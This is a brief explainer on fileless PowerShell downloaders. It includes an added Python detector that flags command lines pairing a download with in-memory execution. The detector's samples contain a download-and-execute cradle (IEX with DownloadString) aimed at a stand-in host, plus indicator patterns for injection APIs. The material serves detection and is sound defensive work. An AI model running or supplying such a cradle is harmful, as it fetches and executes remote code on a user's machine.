This is an ongoing trend. This kind of malware is usually written in PowerShell, a scripting language used on Windows to automate tasks. When the PowerShell script is executed, it can download code and inject it directly into the memory of a legitimate process, so the downloaded malware is never written to disk as a file. Hence, we call these fileless attacks. Most PowerShell malware can be categorized as downloaders.
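Because nothing is written to disk, detection has to rely on process command lines and script logs. The following added example, which is not part of the original page, flags PowerShell command lines that pair a download with in-memory execution, including payloads passed through `-EncodedCommand`; the indicator lists, function names and sample command lines are assumptions constructed for illustration.

```python
import base64
import re

# Indicator groups are assumptions for this example, not a complete rule set.
INDICATORS = {
    "download": re.compile(r"downloadstring|downloaddata|net\.webclient|invoke-webrequest", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression|\[scriptblock\]::create", re.I),
    "injection_api": re.compile(r"virtualalloc|writeprocessmemory|createremotethread", re.I),
    "launch_flags": re.compile(r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b", re.I),
}
# Matches -e, -enc and -EncodedCommand followed by a base64 argument.
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify(cmdline):
    """Sorted indicator groups found in the command line or its decoded payload."""
    text = cmdline + "\n" + decode_encoded_command(cmdline)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def is_fileless_downloader(cmdline):
    """True when a download is paired with in-memory execution or injection."""
    hits = set(classify(cmdline))
    return "download" in hits and bool(hits & {"in_memory_exec", "injection_api"})


# Constructed sample command lines (not taken from any real incident).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLES = [
    "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
    'powershell.exe -nop -w hidden -c "' + CRADLE + '"',
    "powershell.exe -EncodedCommand " + base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii"),
    'powershell.exe -c "Invoke-WebRequest http://example.invalid/t.zip -OutFile t.zip"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(is_fileless_downloader(line), classify(line), line[:60])
```

The last sample downloads to a file on disk and is not flagged, while launch flags alone (first sample) are recorded but never sufficient for a match.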
Here is a list of fileless malware:
- Poweliks
- Kovter
- PowerSniff
- POSHSPY
SOREBRECT is a piece of ransomware that uses the fileless technique.